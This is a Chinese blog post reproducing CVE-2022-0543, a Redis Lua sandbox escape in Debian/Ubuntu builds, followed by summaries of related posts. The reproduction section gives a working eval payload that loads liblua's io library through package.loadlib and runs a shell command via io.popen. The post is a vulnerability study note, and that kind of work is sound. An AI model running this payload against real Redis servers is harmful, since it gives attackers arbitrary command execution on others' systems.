Redis Lua沙盒绕过命令执行(CVE-2022-0543)

最新推荐文章于 2024-10-07 20:15:00 发布
最新推荐文章于 2024-10-07 20:15:00 发布
阅读量331 收藏
点赞数 1
文章标签: lua redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/125663333
版权

Redis Lua沙盒绕过命令执行(CVE-2022-0543)

漏洞原理

在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象package,攻击利用这个对象的加载动态库,可以使用package.loadlib从 liblua 加载模块,然后使用此模块执行任意命令;

影响版本

2.2 <= redis < 5.0.13
2.2 <= redis < 6.0.15
2.2 <= redis < 6.2.5

漏洞复现

登录redis客户端

./redis-cli -h ip -p 6379

执行脚本:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

在这里插入图片描述
成功!

参考:

https://blog.csdn.net/jd_cx/article/details/125422496

免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。

Day_0713
关注
【漏洞复现】redis未授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 1197
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
CVE-2022-0543redis沙盒逃逸)
huayimy的博客
02-03 919
CVE-2022-0543redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
2024.10月7日- 非关系型数据库--- Redis
最新发布
whisper_Java 的博客
10-07 1026
Redis的Set结构与Java中的HashSet类似,可以看做是一个value为null的HashMap。例如,需要存储用户、商品信息到redis,有一个用户id是1,有一个商品id恰好也是1,此时如果使用id作为key,那就会冲突了,该怎么办?Redis中的List类型与Java中的LinkedList类似,可以看做是一个双向链表结构。Hash类型,也叫散列,其value是一个无序字典,类似于Java中的HashMap结构。String类型,也就是字符串类型,是Redis中最简单的存储类型。
CVE-2022-0543Redis 沙盒逃逸漏洞)
热门推荐
Battery的博客
11-23 11万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行命令,也可以根据需求更换其他命令
CVE-2022-0543lua沙盒绕过命令执行)复现
kriesa的博客
07-13 614
CVE-2022-0543复现
redis lua沙盒绕过
08-14
- *1* [Redis Lua沙盒绕过命令执行CVE-2022-0543)](https://blog.csdn.net/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1373
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
CVE-2022-0543
sinat_25635183的博客
03-25 403
2、CVE-2022-0543Redis沙盒逃逸漏洞,Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
CVE-2022-0543redis沙盒逃逸)详细漏洞复现
没事我溜达
03-25 8967
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行CVE-2022-0543Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 直接写复现全过程吧
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Foreverlove112的博客
09-22 577
CVE-2022-0543 Redis Lua沙盒绕过 命令执行
Redis Lua沙盒绕过-命令执行漏洞复现-CVE-2022-0543
apple_52661176的博客
08-30 355
Debian和Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令;要利用此漏洞,攻击者需具有执行 eval 命令的权限(攻击者经过认证、或者 Redis 本身未设置鉴权检查)。当redis经过认证、或者 Redis 本身未设置鉴权检查可以直接连接redis服务。使用Another Redis Desktop Manager工具中的redis控制台输入。更改为自己需要的命令
CVE-2022-0543 Redis沙盒逃逸漏洞复现(CVE-2022-0543)
XZ_______的博客
04-21 1362
漏洞复现
简单漏洞:CVE-2022-0543 Redis Lua 沙盒绕过
栉风沐雪的博客
01-29 1062
CVE-2022-0543 Redis Lua 沙盒绕过漏,在Lua沙箱中遗留了一个对象package,攻击者可以利用package对象提供的加载动态链接库liblua里的函数逃逸。redis在用户连接后可以通过eval命令执行Lua脚本,但是脚本跑在沙箱中,正常情况下无法执行命令读取文件,所以这个漏洞的本质是沙箱绕过。一般情况下,redis运行在6379(默认端口),而在此镜像中映射于36770端口,可以使用nmap扫描端口发现相应服务。影响范围:Debian系得linux发行版本+Ubuntu。
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
qq_50854662的博客
01-05 412
CVE-2022-0543 Redis Lua 沙盒逃逸 RCE
CVE-2022-0543Redis Lua沙盒绕过命令执行复现
网安君的博客
03-16 6169
0x00 漏洞简介 Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本1的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 参考链接: https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce https://bugs.debian.org/cgi-bin/
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值